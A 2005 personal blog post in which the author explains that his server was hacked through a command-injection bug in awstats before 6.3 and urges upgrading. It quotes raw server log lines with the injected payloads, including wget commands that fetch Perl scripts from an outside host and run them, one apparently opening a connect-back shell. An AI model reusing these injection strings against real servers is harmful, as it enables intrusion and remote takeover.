When Script Kiddies Attack

Tony Buser — Tue, 15 Feb 2005 22:40:51 -0500

You might be wondering why my website has been down the last few days. Well I was hacked. This isn't the first time someone hacked into my server, but this was the first time I found out about it practically immediately due to some script kiddy's incompetence which brought the server to a halt. How did they get in? Recently I posted a script I wrote to clean my log files of referral spam that got quite a bit of attention and I linked to my awstats showing the results. (before that I didn't link to my stats page) The problem is, awstats prior to version 6.3 has a bug that allows an attacker to run arbitrary commands on your server. If you're running awstats, UPGRADE NOW. Read on for more information...

The last time I got hacked was about 2 years ago due to the fact that I didn't run regular updates and there was a vulnerability in ssh. Just like last time, the bastard broke in to install an irc bot. sigh Here's the entries in my log that shows how they were able to use awstats to download and install some rootkits:

201.9.219.9 - - [09/Feb/2005:16:31:09 -0500] "GET /archives/2004/01/11/?logfile=&configdir=|echo %20;id;echo%20| HTTP/1.0" 200 24772 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 201.9.219.9 - - [09/Feb/2005:16:31:12 -0500] "GET /archives/2004/01/11/?logfile=|echo%20;id;echo %20|&configdir= HTTP/1.0" 200 24772 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 201.9.219.9 - - [09/Feb/2005:16:31:28 -0500] "GET /awstats/awstats.pl?configdir=|echo %20;echo%20comeco;%20uname%20-a;%20id; %20uptime;%20wget%20;echo%20fim;echo%20| HTTP/1.1" 200 904 "-" "-" 201.9.219.9 - - [09/Feb/2005:16:36:51 -0500] "GET /awstats/awstats.pl?configdir=|echo %20;echo%20comeco;%20cd%20/var/tmp;%20wget %20http://geocities.yahoo.com.br/lippemotta/door.pl;%20perl%20door.pl%20;echo%20fim;echo%20| HTTP/1.1" 200 618 "-" "-" 201.9.219.9 - - [09/Feb/2005:16:37:29 -0500] "GET /awstats/awstats.pl?configdir=|echo %20;echo%20comeco;%20cd%20/var/tmp;%20 wget%20http://geocities.yahoo.com.br/lippemotta/cbserv.pl;%20perl%20cbserv.pl %2070.64.95.79%204567%20;echo%20fim;echo%20| HTTP/1.1" 200 639 "-" "-"

Offending ip resolves as 201009219009.user.veloxzone.com.br. Brazil... question is do I really want to go through the process of trying to report it? I'm sure it won't do any good. Although it was mildly amusing to look at their irc bot's config and login to their channel and look around. It was filled with about 30 similarly named bots, probably also running on hacked servers in some kind of network sharing videos of tv shows like The Apprentice. Don't these people know there are much easier and more efficient ways to get such things using bittorrent... not that I'd know. whistles innocently

Meanwhile, I reinstalled using Gentoo instead of Mandrake with lots of nicer security settings and options (including mod_security). It's something I've been meaning to do for a while, I just wish it hadn't been forced upon me and keeping me up all night for the past few days. I also took the time to upgrade to latest beta of WordPress 1.5. (most excellent) On top of all that as I was in the process of reinstalling, I thought my hard drive had went bad. It turned out it was the power supply... when it rains, it pours.

Juju: When Script Kiddies Attack

When Script Kiddies Attack